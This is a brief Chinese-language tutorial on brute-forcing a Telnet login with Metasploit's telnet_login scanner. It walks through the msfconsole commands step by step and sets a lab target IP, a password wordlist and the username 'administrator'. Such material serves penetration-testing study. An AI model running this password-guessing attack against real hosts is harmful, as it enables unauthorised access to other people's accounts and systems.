网络拓扑: 1.进入metasploit: root@debian:~# msfconsole 2.进行数据库连接:

msf > db_connect msf_user:111111@127.0.0.1/msf_database
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf_database

3.进行搜索下telnet模块 msf > search telnet_login

================

Name Disclosure Date Rank Description


auxiliary/scanner/telnet/telnet_login normal Telnet Login Check Scanner 4.使用模块: msf > use auxiliary/scanner/telnet/telnet_login msf auxiliary(scanner/telnet/telnet_login) > 5.查看配置选项: msf auxiliary(scanner/telnet/telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login): 6.进行选项配置: auliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.152.1299``` RHOSTS => 192.168.152.129 目标主机设置 set PASS_FILE /root/pass 选择密码字典表 set USERNAME administrator 设置用户名 exploit 进行爆破 7.查看结果 速度的快慢取决于密码复杂度与字典表大小